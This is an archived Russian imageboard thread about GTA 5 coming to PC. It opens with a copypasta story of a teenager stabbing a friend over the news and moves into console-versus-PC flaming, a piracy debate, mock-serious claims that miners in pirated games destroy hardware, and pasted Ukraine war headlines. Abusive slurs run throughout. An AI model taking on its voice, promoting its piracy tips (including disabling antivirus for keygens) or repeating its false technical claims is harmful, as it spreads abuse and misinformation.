Первый. ДА будет срач.
Освящение ГРИБАМИ:
Вечером юный Василий Плойкин как всегда, сел играть в свою любимую гта 5 на своей любимой иксбокс 360, на которую он копил в течении долгих месяцев. Он экономил на школьных завтраках, бережно откладывал тот мизерный процент от бабушкиной пенсии, которую она ему давала и никуда не ходил гулять летом, чтобы не совершать лишних трат. И вот к началу нового учебного года ему наконец удалось купить себе иксбокс. Он был счастлив как никогда. Все начало сентября он отсчитывал дни до выхода игры, витая в облаках на уроках и думая о том как же классно будет играть в этот шедевр тысячелетия от рокстар. Но больше всего его радовал тот факт, что эту игру никогда не получат игроки выбирающие себе ПК в качестве игровой платформы. Такие ребята часто унижали его в школе и он считал их низшим слоем общества. Он чувствовал, что это своего рода месть. Очень сладкая месть, последствиями которой можно будет наслаждаться вечно.
С тех пор прошло уже много месяцев. С того дня Василий ни одного вечера не проводил без любимой игры. Его успеваемость в школе начала падать, некоторые друзья перестали с ним общаться, потому-что он не выходил с ними гулять, вместо этого просиживая все свободное время за консолью. Когда они говорили ему о том, что еще есть куча интересных занятий, он посылал их к черту и называл мерзкими пекарями. Те не понимали его и решили не трогать лишний раз, а то черт его знает.
- Что сегодня на ужин? - Громко крикнул он маме.
- Грибы со сметаной, как ты любишь. - Незамедлительно последовал ответ с кухни.
"Замечательно" - подумал Василий потирая руки. Оставался лишь виски, который он незамедлительно своровал из папиного бара, пока тот на работе. Плойкин не любил виски, но все равно выпивал по стаканчику в неделю, потому-что он хотел жить как персонажи из его любимой игры. Он мечтал, что будет иметь дом как у Майкла, гонять на быстрых и дорогих тачках как Франклин, был бы не против упороть наркоты как Тревор, только не так жестко.
Ну и потрахивать телочек как все, он тоже хотел, конечно же. Он верил, что однжды его мечта станет явью.
После игрового сеанса, он как всегда подвачевал капчу со своего бюджетного смартфона, перепрятал виски, и лег спать.
Утром его ждало нечто страшное. Он уже несколько минут сидел перед маленьким дисплеем своего смартфона и разглядывал эту надпись "COMING THIS FALL ON PC". Он просто не мог в это поверить. Где-то внутри разгоралась ярость и чувство того, что его предали отражалось горечью в горле. Ему захотелось плакать, даже рыдать, но он кое-как сдержался. Встал с кровати и дабы вымесить всю накопившуюся в нем злость схватил свой иксбокс и со всего маху ударил его об стену. В руках остался небольшой пластмассовый осколок и Василий просто физически не мог его выбросить. Он так и отправился на улицу. Не обращая ни на кого внимания он дошел до центра двора и упал на колени.
- Эй, Вась, ты чего? - Послышался голос со спины. - Не кисни так. Ты уже слышал новости. ГТА 5 выходит на писи и новые консоли уже осенью. Здорово, правда?
Это был один из его немногочисленных друзей. У того с детства был пк, но Василий давно подговаривал его купить консоль, полагая, что рано или поздно тот сломается.
Ничего не отвечая он вскочил и всадил осколок иксбокса ему прямо в горло. Тот, брызжа кровью во все стороны свалился на пол и поднял столп пыли. Василий так и не сдвинулся с места.
Полицейские быстро нашли его, ведь он даже не попытался бежать. Через некоторое время он оказался в колонии для несовершеннолетних.
Отморозки сегодня не спят.
Впереди Василия ждет страшная ночь, наполненная ужасом и болью
Я вообще не работаю, даже для меня 1000 в месяц на видеоигры - это не деньги.
Системные требования уровня PS4:
AMD X6 3.5 GHz/Intel Core i5 3 GHz
AMD Radeon HD 7790/Nvidia GeForce GTX 650 Ti Boost
6 Gb RAM
25 Gb HDD
>>7884525
Мамкин школьник из ДС не показатель, иди отсюда.
>>7884527
Охлол, моя вафельница потянула бы.
Это "рекомендуемые"?
>питается красной ценой
>живет в рашке и поддерживает путина
>против Западных Ценностей и Евросоюза с США
>зато покупает "игры" с говностиме у бородатого еврея и считает себя элитой
>живет с мамой не работает
>кричит КРЫМНАШ
>>7884525
Мне мамка в школе тоже косарик в месяц давала на карманные расходы.
Омич
>>7884540
Это чтобы можно было поиграть в фулашди с высокими настройками.
>>7884259
>+ игры в единой библиотеке, не нужно шарится по интернету
С пиратством тоже самое. Торрент-трекер - есть единая библиотека. Для пк игр последних 15 лет - rutor, для консольных - тапки, для старых пк и консольных, а так же всего остального - рутрекер.
>+ доступны всегда, когда доступны серваки стима
На пиратке игры доступны всегда, покуда жив жесткий диск, на который они установлены.
>+ патчи устанавливаются автоматически
Качаем репаки со всеми патчами, куда кроме них ещё включены и DLC.
>+ ачивки, карточки
Здоровым людям в этом нет необходимости.
И отдельно я добавлю, что честно купленная игра не избавляет от проблем с ней. В лицушной игре так же могут быть и баги, причем вполне себе критические. Стим работает далеко не идеально. Когда я играл в коопе в ср4, то постоянно вылетал, причем не из-за проблем с инетом - виной был сетевой код игры. А последнюю миссию мы вообще не могли пройти из-за рассинхронизации, в результате я постоянно умирал на пустом месте. Мучились наверное минут 30 постоянно перезапуская миссию и игру. Потом пришла идея фикс и игру пересоздали поменявшись ролями "сервер-клент". Прокатило. Играя в RE6 пару дней назад так же поостоянно выкидывало. Оказалась беда в тех. работах что ведутся в стиме. Габен играть в тот день не разрешил. Ну вот и что это за хуйня?
>>7884438 >>7884416 >>7884300
Лицо пиратов:
Прыщавый, потому что жаль денег на средства за уходом за кожей, жирный, потому что нет денег на абонемент в спортзал, живущий в залупе без ремонта, потому что ДОРОХО, уебан, мастер наеба счетчиков. Не считает труд других людей чем-то достойным к оплате, так как работает в интернете в лохотронке, кликает на рекламу "Я зарабатываю 300$ в день без напряга и ДЯДИ"
>>7884553
>И отдельно я добавлю, что честно купленная игра не избавляет от проблем с ней
Ты не знаешь про гугл и форумы Steam? у меня не запускалась купленная ГТА4 и эпизоды, нашел решение за 5 минут.
>>7884543
Откуда ты все про меня знаешь?
>>7884549
Как же печально, что я не поиграю, ибо я буду играть в "кривой порт на пк" ЖТА4. Биздец.
>>7884543
>фапает на западный мир
>считает, что он свободный человек
Топ кек.
Да и вобще игра говно.
Бля, уже как-то даже шутить про титаны не охота, придумайте новый аутизм какой-то, а то как себя развлекать, до выхода игры ещё все ебаное лето.
>>7884540
Это чистая спекуляция и пиздеж на ровном месте.
>>7884562
Нахуя мне тратить свое время на гугл и форумы стим, когда я купил игру и она должна у меня работать без проблем?
>>7884543
Исправил:
>питается красной ценой
>живет в рашке и поддерживает путина
>ворует игры, потому что мамка не дает деньги и говорит что если можно взять бесплатно - бери
>живет с мамой не работает
>кричит КРЫМНАШ
>АМЕРИКА СКОРО РАЗВАЛИТСЯ
>>7884558
Лицо стимораба:
Тратит деньги на
-средства за уходом за кожей, хотя выходит из дома только на работу и обратно
-есть абонемент в спортзал, куда сходил в два раза
-все свободные средства тратит на покупку ДЛЦ
-отсосал бы Габену, если ему позволили бы
>>7884571
Можно одинаково обсирать как западаный мир так и расиянские ценности, быдло ты тупое.
>>7884553
> Торрент-трекер - есть единая библиотека.
Ахуенная единая библиотека: 20 раздач одной игры от разных релизеров со своими инсталяторами, которые могут выёбыватся.
Алсо:
> - раздача может сдохнуть
> - не везде может быть доступен мультиплеер/кооператив
Ещё и доступ к трекеру могут перекруть inb4 пидорашка
> покуда жив жесткий диск,
Ключевой момент. И покуда место есть.
> Качаем репаки со всеми патчами, куда кроме них ещё включены и DLC.
Вышло что-то новое? Перекачивай.
> Здоровым людям в этом нет необходимости.
Дело вкуса
> остальная паста
Это уже к разработчикам, а не к сервису.
>>7884575
Многого хочешь, пиздюк маленький. Последнее время почти все игры выпускают недоделанными. И даже на консолях встречаются проблемы.
Пофикшено для актуальности.
>>7884581
>средства за уходом за кожей, хотя выходит из дома только на работу и обратно
НУ МММ Я НИКУДО НИ ВЫХАЖУ ММ ПОХУЙ КАК Я ВЫГЛЯЖУ ММ))0)))0
>>7884587
>считает, что на западе нету быдла
>>7884592
>Вышло что-то новое? Перекачивай.
Я конечно стимобоярин, но даже я знаю про кнопку "обновить трекер"
>>7884601
Окей перекачивай переустанавливай
Поясните за персонажей в онлайне. Если создашь нового, то уровень сохранится?
>>7884598
Как раз-таки наоборот. Быдло на западе мало чем отличается от быдла рассеянского. То же самое и с гоптой, и с хачами-нигерами и так далее.
Мир вообще одна большая жопа, если ты еще не в курсе.
>>7884605
Что ж ты в стиме ради ДЛЦ игру не переустанавливаешь, диван?
>>7884608
Запад vs Расея. Шо то хуйня, шо это хуйня. Но в рашке свобод всё же побольше будет.
>>7884596
Именно
>>7884609
А давно ДЛС легко и свободно на пиратку встают? Без вот этой хуйни с кряками/конфигами и прочей.
>>7884608
Ты просто сам будь добрее, злость, она разрушает :3
>>7884619
>Но в рашке свобод всё же побольше будет.
>>7884624
>ставиться
ставится
И на пиратке то же самое, так зачем говорить о том, о чём не знаешь?
Мрази сука не будет гта это шутка боже скажи что это шутка боже пожалуйста не нужно сука пекамрази блядь пидорассыыыы
Да кто вообще эти обезумевшие, что в стиме покупают ДЛС?
Я помню купил МП3 на распродаже за 3 или 4$ и там DLC на предлагали мне дохуя, карты там какие-то, пиздец, это правда кто-то покупает?
>>7884592
>Ахуенная единая библиотека: 20 раздач одной игры
Качаешь от проверенного релизера. Это не большая проблема на самом деле, если тебе не 12 лет и ты не впервые открыл страницу с торрентами.
>Вышло что-то новое? Перекачивай.
Все патчи пиратские крякерские команды релизят отдельно. Собсно так же скачиваешь патч и накатываешь поверх. Да, это не автоматически. Но во-первых я очень редко играю в игры на релизе, во-вторых это не так страшно - небольшая плата за халяву.
>Это уже к разработчикам, а не к сервису.
В случае с RE6 проблема была именно в сервисе. В любом случае, я плачу деньги и требую качества. Если в случае с пираткой мне похуй, могу и пережить, то в случае с лицухой это вызывает протест.
>>7884593
На консолях гораздо реже. Во-всяком случае игра гарантировано запустится.
Да не выйдет она на пк!
>>7884616
Как же я проигрываю с него сука, ВЫ КУПИЛИСЬ НА РАЗВОДКУ КУПИЛИСЬ, главное глаза такие, налитые слезами НУ НЕ ВЫЙДЕТ ОНА.
>>7884466
>Страница лучшей версии игры в Steam
Ну че? Когда предзаказ и системки будут?
>>7884611
>Именно благодаря пиратам у нас зародилась в 90-х IT-отрасль. Благодаря им десятки и сотни тысяч IT-шников - программистов, системных администраторов, сетевых инженеров и т. д. - стали тем, кем они стали. И пираты по-прежнему помогают им в их деятельности, а также и новым поколениям людей.
МАМА СМАААААТРИИИ! Я ВОТ ЭТУ ИГРУ СИЧАС СКОЧАЮ И ЭТИМ САМИМ ПАМАГАЮ ПАПЕ И ЯГО КАЛЛЕГАМ РАБОТИТЬ!!!111 ПАНИМАЕШЬ! ОТ МИНЯ ВСЬЕ ЗАВИСИТ!!!111
Почему нельзя просто купить прошитую консоль, а для любимых лицензионных игор юзать ПК? На консоль просто скачал игру и играй, никаких тебе заёбов с репаками, кряками и патчами.
>>7884644
>Во-всяком случае игра гарантировано запустится.
У меня все запускается без проблем и пиратки и лицензии. Это у них шиндовс1999васянЕДИШН и банально не знают про драйвера видеокарты.
>>7884662
>На консоль просто скачал игру и играй, никаких тебе заёбов с репаками, кряками и патчами.
Не поверишь - на ПК тоже самое.
Я хочу отыгрывать в онлайне Каталину или еще какую-нибудь интересную личность.
>>7884662
А пс4 прошили уже?
Я бы тогда купил, потому как на говне мамонта играть не оче хочется, я слишком эстет для этого.
>>7884666
>Пираты. Пираты нэвер ченджс.
Каждый скачавший игру официальное признаётся мразью. Но так, как скачают её 90% этого треда можно сказать, что большинство пекарей мрази.
Вы ведь понимаете насколько сильный удар по индустрии наносит пиратство?
>>7884644
Я понял кто ты. Ты ебанный агент cg, который прибежал сюда агитировать за пиратство, так как у консолемразей все аргументы закончились и они навино полагают, что если гта 5 в очередной раз хуево будет продоваться, то шестую не портируют.
Я раскусил тебя!
>>7884666
>найди рабочий репак
>убедись, что вместо кряка не лежит вирус или майнер
>после обновления игра больше не запускается
>установка 1,5 часа
И да, для консолей игру не нужно взламывать, ибо взламывается сама консоль.
>>7884676
>мразь гнида поубивал бы
>>7884676
>Вы ведь понимаете насколько сильный удар по индустрии наносит пиратство?
А если я покупаю только со скидками или на распродажах, то я не наношу урон? Ответь пожалуйста, для меня это очень важно.
>>7884689
Не наносишь, т.к. скидки и распродажи сами разрабы и устраивают. Внезапно, да?
>>7884689
Нет. Потому что скидки устанавливаются с разрешения разработчика.
Я куплю коллекционку на Пк
>>7884676
>Пираты
>ченджс
Обоссал тупого, не могущего в английский консолеребёнка, но при этом изображающего потуги в этом направлении.
Я считаю что у Тревора самый уютный Save House. Такой то трейлер в пустыне. Для хикки - самое то.
>>7884695
Спасибо.
>>7884662
>На консоль просто скачал игру и играй
Только если с папугаем на плече. Лицензиобедняги в цифре как раз таки репаки раньше качали. В последнем поколении хватило ума это поправить.
>>7884676
>Вы ведь понимаете насколько сильный удар по индустрии наносит пиратство?
Не понимаем. А ты?
Я еще напоминаю вам, что в пиратских версиях сейчас сидит куча майнеров, которых вы заебётесь выковыривать. Вон аноны схватившие их аж меняли жесткие диски по такому случаю, так что задумайтесь. На консолях, например, нет никаких страшных майнеров и никто не будет воровать мощности консолей. А у вас вон майнер на майнере и майнером погоняет. Система обычного ПКаря похожа на муравейник в котором живут сотни майнеров.
Уважаемый паста-кун, ты тут? Можешь запилить пасту про школьника, владельца прошитой xbox360, мечтающего жить как в GTAV?
>>7884682
Мантра консоледебила.
У меня это выглядит так:
>Найди репак
>Установи за 5 мин.Проц себе купи, 1.5 часа у него.
>Играй
Не одного вируса или ещё какой хуйни, потому что качать нужно с проверенных сайтов, где все резилы проверяются модератором.
>>7884676
Я пирачу много старых игр, ибо платить за них - нет смысла в большинстве случаев, но 5 куплю однозначно.
>>7884723
>Я еще напоминаю вам, что в пиратских версиях сейчас сидит куча майнеров
Это вброс юбисофта. Угадай зачем они это сделали?
стимобог
>>7884734
На пастгене - 16. Значит, на нексте ~ 20-25
Не больше.
>>7884752
Дебил, блядь. В прошлый раз сырое говно юбиков за неделю так же утекло, а майнера не было.
Игра выйдет в сентябре, с отличной оптимизацией и ценой для России всего 899. Все будут рады и счастливы, у всех пойдет на высоких/максимальных настройках. В игру добавят много нового, онлайн расширят до 32 человек и добавят новый уникальный контент. Я вас всех люблю.
>>7884726
Я немного добавил об этом в той пасте про Васю, но могу и отдельную написать. Правда уже ближе к вечеру, а то сейчас ни капельки вдохновения.
>>7884748
У пк кол-во текстур будет 3 или 4 пака, на некстген похуй абсолютно.
>>7884748
>Текстуры_СУПЕРВЫСОКОГОРАЗРЕШЕНИЯУЛЬТРАШД_в_Фульвтенштейне_и_Калл_оф_дути.jpg
Игра и 50 может весить. Вон в в вульфе текстуры не стали запаковывать, колда вообще весит 32 гига, в Титанфоле из 49 гигов 32 занимает звук.
>>7884770
>Правда уже ближе к вечеру, а то сейчас ни капельки вдохновения.
Можешь не спешить, у нас 3-4 месяца, лол.
Какие, блядь, майнеры? поясните, равзе они не должны проц и видюху нагружать? Если майнеры в пиратке то какого хуя нихуя не загружено?
Майнеры же антивирусами детектятся. Или в 2014 этот софт использовать уже не модно?
>>7884798
Они грузят в тот момент, когда ты запускаешь ЛЮБУЮ игру. Майнер сжирает все мощности до максимума, а тебе кажется, что это игра. Из-за таких нагрузок комп быстро сгорает. Майнер один из самых опасных паразитов на данный момент.
>>7884803
Нет, некоторые везучники из действительно нашли.
>>7884809
Играю в вотч догс 3 недели, чому-то не сгорел.
>>7884743
Проц расспаковывает репак, хард записывает, хотя может и не так.
В любом случае, во время установки игр у меня нагружается проц.
>>7884816
Ну это пока. Это не быстрый процесс и может занять до двух месяцев, в этом то и весь смак. Ты думаешь, что у тебя ничего нет, что всё нормально и вот ты 3 недели играешь норм, но на самом деле твой ПК медленно умирает.
Поэтому нужно репаки от механиков качать. А не ноунейм говно.
>>7884820
Все верно. Не зря же при тестах процессоров, кроме спец. тестов ещё используют прогон крупного файлового массива через winrar и последующую разархивацию.
Прошел смотри собаку, больше там делать нехуй, тотальная непродуманность и глупость всего, начиная от консольных сохранений и загрузок, кончая ИИ, запрыгнул на машину копам - застрелили на месте. Вернулся в ГТА 4, щас проехал мимо тачки копов, через окно убил обоих и слинял, не получил выше 1 звезды, т.к. никто не успел понять кто я и что произошло.
>>7884809
Блядь, это можно посмотреть все в процессах же сколько загруженность цп и тд, если бы там майнилось что-то еще к слову майнинг сжирает до 100% ресурсов компьютера то игры бы просто не игрались.
>>7884773
Не путай ID tech 5, у которого проблемы с текстурами, двигло колды, у которого проблемы со всем, и сурс в неумелых руках с Рокстаровским двиглом.
Поверь, не больше 30
ВНИМОНИЕ НА КОНСОЛЬНЫХ В ВЕРСИИ ВОЧДОГС ОБНАРУЖЕН МАЙНЕР, СРОЧНО ПРОКИПЯТИТЕ ГЕЙМПАД В МАРГАНЦОВКЕ, ЧТО БЫ КАНСОЛЬ НЕ СГОРЕЛА!!!
>>7884823
Тащемта от механиков тоже с майнером. Суть в том, что самая первая пиратская версия, на основе которой делались все пиратки, была с майнером.
Все скачавшие не репак со стим версии 100% схватили майнер и просто не знают об этом. В стим версих тоже могут быть майнеры потому, что люди делавшие репаки имели у себя на пк майнеры и эти майнеры сами копировали себя в репак, они очень живучи.
>>7884809
>Из-за таких нагрузок комп быстро сгорает.
Мамкин технарь в треде! Спешите видеть! Ничего что консольное железо постоянно находится под сильной практически 100% нагрузкой и при этом консоли живут хуй знает сколько времени? Даже те же NES ещё дохуя в рабочем состоянии можно найти, а ведь консоль 86ого года блядь.
Майнер вредит только тем, что использует мощности твоего компа для обогощения левого чувака, только и всего. Ну и разумеется производительность системы падает, т.к. все ресурсы уходят под майнинг.
>>7884847
Так если все ресурсы уходят на майнинг как игры то, блядь, играют? Логично же, что это было бы заметно, они бы вообще не играли или лагали жутко.
Хули вы про майнинг раскукарекались, если ничего не смыслите в этом? Дебилы-обоссанцы.
>>7884846
> майнеры сами копировали себя в репак, они очень живучи.
Так Нвидиа выпустила же драйвера со встроенными майнерами, сразу после выхода. Зачем они будут копировать себя?
>>7884852
Они и лагают. Откуда, ты думаешь, столько вайна про НИАПТИМИЗИРОВАЛИ во всяких Ассассин и Вачдогс тредах? Вот отсюда. Копы кишат майнерами и даже сильные машины еле тянут игры. Майнеров у всех дохуя на пекарнях.
>>7884809
>Из-за таких нагрузок комп быстро сгорает
Когда нагрузка на ЦП и видеокарту критическая, то бишь - нагрузка под которой есть вероятность сгорания чипов, они автоматом отрубаются. И убрать это можно только в биосе.
И вообще, спустя два года майнинга мой 5летний компьютер чувствует себя прекрасно.
>>7884852
Ну вот спросите у тех, кто словил его. Либо там по-умному распределяется, например юзается 50% мощности, либо майнинг высвобождает ресурсы под другие задачи, а не тупо забирает все. Ну либо да - будут тормоза неописуемые, но что-то мне подсказывает что там не так тупо все.
Майнеры это бич пекарей 21 века. Он почти не обнаружим, его практически невозможно вывести без смены железа и он медленно и верно убивает комп.
Спасибо, не надо мне такого добра, я лучше на консолях поиграю без читаков и майнеров.
>>7884886
>5 лет
>пока....................................................
Какой ужас, мой компьютер сгорит через 10 лет!
>>7884842
>двигло колды, у которого проблемы со всем
С чем это проблемы у самого популярного двигла в истории?
>>7884865
Это как у пидорашек. Подъезды и улицы у них госдеп засирает. А у пекарей во всём майнеры и консоли виноваты.
>>7884865
>НИАПТИМИЗИРОВАЛИ
Тащемто так и есть, в игре модели подгружаются криво, из-за этого на больших скоростях просадки, на ПК ведь оперативка и видеокарта отдельновроде модели выгружаются из оперативки в ГПУ, могу ошибаться, но что-то типо того происходит, а на ПС4 например это фактически одно и тоже, гибрид такой, хотя даже с учетом этого не смогли добиться 60 фпс.
>>7884889
Слишком толсто.
Ни одного пруфа "мифического не обнаружимого майнера".
И его можно убить просто форматнув диск.
И он не убивает комп "медленно и верно" потому что компьютеры не убиваются нагрузкой, кроме как критичной.
>>7884914
>его можно убить просто форматнув диск.
Гуманитарий спалился.
Такая то игра, 2008 год. Мда.
На некстген-консолях все-равно железо говно. Вот собаки вышли, и что? Посомтрите только на это говно:
>>7884889
если ты не толстишь, то ты клинический долбоеб.
>>7884525
Играй в доту, дропай всякое говно на ивентах, зарабатывай деньги для покупки игр
>>7884925
Да, намного легче просто добавить в брендмауэр адреса копалень и все.
>>7884934
Как связаны консоли и твой говноскрин? На ПС4 даже симуляцию ветра завезли.
>>7884925
Если бы он проникал в системную память, его бы сразу антивирусы запалили, еблан.
>>7884944
Майнеры вообще никак нельзя убить, придурок. Только новое железо покупать. Так как они всасываются в сам металл, хуй ты их выведешь потом.
>>7884949
Он убивает антивирус, ебаклак. Это майнер, а не троян, он в десятки раз сильнее.
>>7884956
Чуть хуже. Но юбики не старались. Зато никаких просадок и багов.
>>7884961
>ебаклак
Со стимом все просто -- пиратобояре качают бесплатно и радуются жизни, ебясь с ключами и таблетками двадцать раз в день, а за нас платят лохи-лицензияшлюхи. Все как в школе -- зачем брать деньги на булочки у мамы, если их можно отобрать у васьки омежкина по прозвищу "писюн"?
>>7884891
>IW engine
>Самый популярный
Молодой человек, вы обосрались.
Самый популярный - UE3
Самый доступность\охуенность - Source
Самый спорный - id Tech 5
Самый красивый Cry Engine
Самый охуенный - RAGE от R*
>>7884978
>ебясь с ключами и таблетками двадцать раз в день
Как там на модемном соединении?
Репачки от Васяна нужно всего-то установить
>>7884978
>зачем брать деньги на булочки у мамы, если их можно отобрать у васьки омежкина по прозвищу "писюн"?
Т.е. у тебя?
>>7884466
>полная интеграция в Steam
ДОЖДАЛСЯ ТАКИ!
И ещё шапка изначально без КОНСОЛЬЩИКИ СОСНУЛИ.
ОП МОЛОДЕЦ!
Спасибо тебе.
>>7884978
>ебясь с ключами и таблетками двадцать раз в день
Посмотрите на эту пониблядь, она же застряла в нулевых!
Я всегда знал, что покупают игры только те, кто не может двух лишних действий сделать - прочитать описание к рипачку и отключить антивирус при открытии кейгена.
>>7884998
>пок пок пок гита читыри серый грофон уебищная аптимизация ибо тормазит на четвертам пентиуме!!
>>7884934
И нахуя ты тут минималками своими светишь?
>>7885011
Что несёшь? Я спросил почему вдруг рэйдж оказался ахуенным?
Я не могу понять консольщиков, зачем покупать коробочку которая по всем параметрам уступает компу? Железо, ну тут понятно. Компактность(компьютер это: игры, фильмы, работа, учеба, общение и многое другое), а консоль это игры ну и фильмы, все. Так зачем покупать консоль когда плюсов у компа больше?
>>7885006
А если антивирус божественный Аваст, то его даже отключать не придется!
>>7885014
> постит такую же мазню, ТОЛЬКА С МАСЛИЦОМ ОТ ДОЖДИЧКА, ТИП ЙРБА ГРАФОН И ТИП НИКТО СКВОЗЬ МЫЛА НИ УВИДИТ ТЕКСТУРАК))))
>>7885014
она интересная хоть? лучше saints row или батлы?
качать всякое говно не особо хочется
>>7885021
Отличная физика, лучшая графика на PS3/X360, возможность в большие пространства.
>>7885023
Потому что можно разлечься на диване с гейпадом и уплетать пельмеши с пивасиком и кальмарами, чутка подергивая рычажки девайса.
>>7884999
Такой большой мальчик, а стрелки косит как пятиклассник!
>>7885023
>а консоль это игры
Зыс, а пека это работа.
>Так зачем покупать консоль когда плюсов у компа больше?
Малолтнему нищеброду невдомек, что пека и так есть у всех, а консоль благодаря ее эксклюзивам, простоте(да, да даже мне быдлокодеру лень ебаться с пекапроблемами) использования и просто собственной охуенности становится идеальной игровой платформой.
пека- для 1с, торрентов, кинцаж;
консоль- для игорей.
>>7885038
Тебе всегда попадались репачки с рэпчиком и едва заметной кнопкой отключения музыки?
>>7885014
Прямо как на ПС3
>>7885046
Но я же не дрочу на пони, пацаны так не делают. А послезавтра тебе пизда перед уроками.
>>7885055
>а консоль благодаря ее эксклюзивам
Спасибо, мой день удался0)
>>7885084
Чё забыл как ты вчера свой портфель искал по классу как ебанутый?)) А потом на тебя училка наорала, вот ты лох)) Надеюсь сюрприз от нас нашёл внутри?))
>>7885033
Кроме того что перечислил >>7884998 анимация, физика, огромные высоко детализированные пространства, может в офигенные повреждения тачек, освещение супер, тысячи динамических объектов в одном кадре и т.д. Также качество\производительность тут лучшее что я видел. "Ко-ко-ко жта4 плоха сделали - тормозит" речь про Max Payne 3. Ну и глядя на GTA V и характеристики пастген консолей, тоже можно сделать выводы, а на пека конечно же будет самым красивым сэнд боксом.
>>7885108
>а на пека конечно же будет самым красивым сэнд боксом
Ну дай бог не самым.
И зачем, спрашивается, теперь нужна ГТА 5 на ПК?
>>7885103
Мы так не издевались надо омегой. Максимум -- тетрадь разрисовывали ему. Один раз он расплакался даже, когда мы разрисовали страницу, где он нарисовал какую-то хуету.
>>7885119
На момент выхода и + еще несколько лет. Или есть другие кандидаты? Инб4 Бэтман он не сэндбокс
>>7885135
Двачую, здесь полиция город патрулиует и может арестовывать нпс.
В 5ке же полицейские авто не спавнятся пока игрок не получит уровень розыска.
А нпс полиция теперь просто расстреливает.
>>7885135
Блядь аж передергивает от ебаного LODa четверки. А еще бесило что вода возле берега глючит когда с вертолета на нее смотришь. Все таки надо было рокам лучше в своем движке разобратьсяЮ прежде чем гта выкатывать, вот пятерка другой разговор, даже на консолях выглядит охуенно.
>>7885083
>Показали ролик, без геймплея.
>>7885192
Господи, ну что за деревня? Хотя это и не мудрено, ведь мимо пекаотшельника бОльшая часть игроиндустрии проходит и он живет в одиночестве, питаясь объедками и переваренной пищей консолегоспод.
>>7885142
Потом такие как он будут обвинять рашкинский менталитет и станут пидорасами.
>>7885174
Что то хуйня, что это, не нужна такая ссанина на пека, мне особенно. Мне только RDR нужен, но он выйдет вместе с версиями для новых консолей в 2015 году.
Я проигрываю с этого треда. Когда хочу увидеть дегенератов, тупее чем в б или вконтакте, я смело иду сюда. Лучший тред.
>>7885218
>ПОК-ПОК, НИНУЖНА, КУДАХ-КУКАРЕКУ, НИНУУУУЖНА, НЕЕТ, НИНАДА, НАМ И ТАКАМАНА ХОРОШО
Все, что и может прокукарекать в бессильной злобе и порывах аутотренинга пекапетушок
Мне 20 лет
>>7885218
Конечно выйдет. У нвидии даже акция будет - покупаешь десять титанов и в подарок получаешь РДР и ГТА 5.
>>7885232
Хуя се. Зачем ты конченную фантазию запостил?
Обоссал аутиста-мылоопущенку.
Крымотред стартует здесь.
>>7885231
А тебя наверное отец в детстве прилюдно опускал и огурчик в попу пихал, раз ты сейчас такой гламурный пониёбчик и без внимания обойтись никак не можешь.
Луганск готовится к обороне. Колонна бронетехники вооружённых сил Украины движется в сторону города со стороны поселка Счастье. Об этом сообщили в руководстве Луганской народной республики.
Численность группировки, которая идет в сторону Луганска, не уточняется. По данным ИТАР-ТАСС, в результате наступления на поселок Счастье, когда киевские силовики применили боевые вертолеты, ополченцы были вынуждены отойти к Луганску. Сейчас они перегруппировываются.
По данным ополченцев, потери украинских силовиков в столкновении под Счастьем составили восемь человек.
http://russian.rt.com/article/36451
>>7885260
Убеждай себя дальше, фантазер.
Постеснялся бы хоть раз перед мамкой в такое играть.
Японцы какие-то, пидорские одежки.
Может ты уже и в Гейропку на тракторе съебал?
Ополчение Горловки: Сбит украинский Су-24
Ополченцы посёлка Горловка на востоке Украины заявляют о том, что сбили украинский самолёт Су-24. Пилота допрашивают, - сообщает РИА Новости.
Оригинал статьи: http://russian.rt.com/article/36453#ixzz34babara0
Уже в который раз пекаонлиопущенки насосались консолехуев в собственном же разделе. Да что ж такое-то, все их унижают и чмырят, а им все мало и просят добавки. Неисправимые пекааутисты.
>>7885260
Эту хуйню на два вечера, можно вместе с соснолькой и у друзей взять пройти. Играть же нужно не в кинцо, а в настоящие игры такие как рокстар делает.
>>7885292
Что не канает? Твоя жизнь вся убога, а на двощах ты всех убеждаешь в правдивости своего манямирка. И вообще это тред про игру для школьников, проваливай откуда тебя прорвало пока не обоссали.
В результате обстрела в Мариуполе погибли три украинских пограничника
.
.
14 июня 2014 года 13:12
Москва. 14 июня. INTERFAX.RU - По предварительным данным Госпогранслужбы Украины, трое пограничников погибли, четверо получили ранения в результате обстрела колонны техники в Мариуполе (Донецкая область).
"По неподтвержденным данным, трое пограничников погибли и четверо получили ранения", - сообщил агентству "Интерфакс-Украина" руководитель пресс-службы погранведомства Олег Слободян.
Он подтвердил, что колонна пограничной техники была обстреляна в Мариуполе в субботу утром
Смотрите оригинал материала на http://www.interfax.ru/world/380893
>>7885297
>http://2ch.hk/cg/
>[Скорость борды: 18 п./час]
Бедняжка, поговорить о шедевральных экзах больше не с кем
>>7885297
А причем тут эта хуйня кодзимовская? Которая как и предыдущий мгс выйдет на пека.
>>7884504
Я хоть и заядлый пекарь, но когда я вижу такие пасты, где автор обвиняет консольщиков в том что они школьники, и при этом пишет "в течениИ" в значениии времени букву И, то думаю, что автор сам еще ебаный тупой школьник. Это же 7 класс, епт!
Агентство «Украинские национальные новости» впервые назвало операцию, которые проводят силовые структуры Украины на востоке страны против ополченцев Донецкой и Луганской народных республик, карательной.
Оригинал статьи: http://russian.rt.com/article/36445#ixzz34beORq1Y
Как сообщил в интервью RT пресс-секретарь минобороны ЛНР Алексей Топоров, в аэропорту Луганска вспыхнул бой между днепропетровскими и львовскими десантниками. Одна из частей – днепропетровская - подняла флаг Империи, пожелав покинуть территорию аэропорта.
Оригинал статьи: http://russian.rt.com/article/36439#ixzz34becOboc
>>7885304
>настоящие игры
>одна и та же унылая песочница 15 лет
ребенок не палится
>>7885317
>Ну трапы ведь бывают норм
Ну ничего, недолго осталось.
>>7885348
Да играй ради бога, я тут причем?
Разрешения просишь? Ок, можешь даже вздрочнуть на игруху.
>>7885381
Только в рамках правового поля.
Один хуй пастген сосет по полной. Заибца на плойке4 и Х-оне. На пеке почти все тоже самое бует, только дальность прорисовки и качество удаленных обьектов будет в 1.5 - 2 раза лучше (на хайэнд конфигурациях).
Теперь это понитред?
>>7885398
Да не надо мне. Лучше в старые вины поиграюсь. Неутенок
>>7885398
Да и вообще пс2 соснула больше всех, т.к. на нее гта 5 вообще не завезли и ногеймз там больше, чем на боксе360.
Написал в тред
@
Тред умер
Как это типично для меня.
>>7885388
Ну как обычно. Все самое интересное нельзя.
>пастген
это про пс4 так?
>>7885026
У меня полыхнуло чутка. Это кокой-то пиздец, а не антивирь.
>>7885510
Хоронили давеча ПК (лет 15 уже), порвали 2 бояна (Атари и Сегу).
